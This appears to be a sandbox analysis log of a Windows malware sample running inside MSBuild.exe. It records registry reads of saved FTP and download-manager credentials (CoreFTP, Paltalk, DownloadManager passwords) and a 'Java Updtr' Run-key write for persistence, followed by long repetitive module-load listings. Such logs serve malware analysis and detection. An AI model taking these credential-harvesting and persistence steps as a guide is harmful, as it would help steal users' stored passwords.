Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Paltalk - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC - False 2
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUC - False 2
Fn
Open Key HKEY_CURRENT_USER\Software\DownloadManager\Passwords - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Impersonation Level, data = 3 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Namespace True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Namespace, data = 114 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductId, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = Java Updtr, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites value_name = Host, data = 2147942402 False 1
Fn
Read Value - value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesPort, data = 2147942403 False 1
Fn
Read Value - value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesUser, data = 2147942403 False 1
Fn
Read Value - value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesPW, data = 2147942403 False 1
Fn
Read Value - value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesName, data = 2147942403 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander value_name = UninstallString, data = 2147942402 False 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = Java Updtr, data = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 130, type = REG_SZ True 1
Fn
Module (630)
»
Operation Module Additional Information Success Count Logfile
Load C:\Windows\system32\advapi32.dll base_address = 0x74d40000 True 1
Fn
Load C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll base_address = 0x6a310000 True 1
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x74f40000 True 1
Fn
Get Handle private_0x0000000000400000 base_address = 0x400000 True 4
Fn
Get Filename private_0x0000000000400000 process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 5
Fn
Get Filename c:\windows\syswow64\advapi32.dll process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 5
Fn
Get Filename c:\windows\syswow64\user32.dll process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 4
Fn
Get Filename c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 4
Fn
Get Filename private_0x0000000000400000 process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 4
Fn
Get Filename c:\windows\syswow64\advapi32.dll process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 4
Fn
Get Filename c:\windows\syswow64\user32.dll process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 3
Fn
Get Filename c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 3
Fn
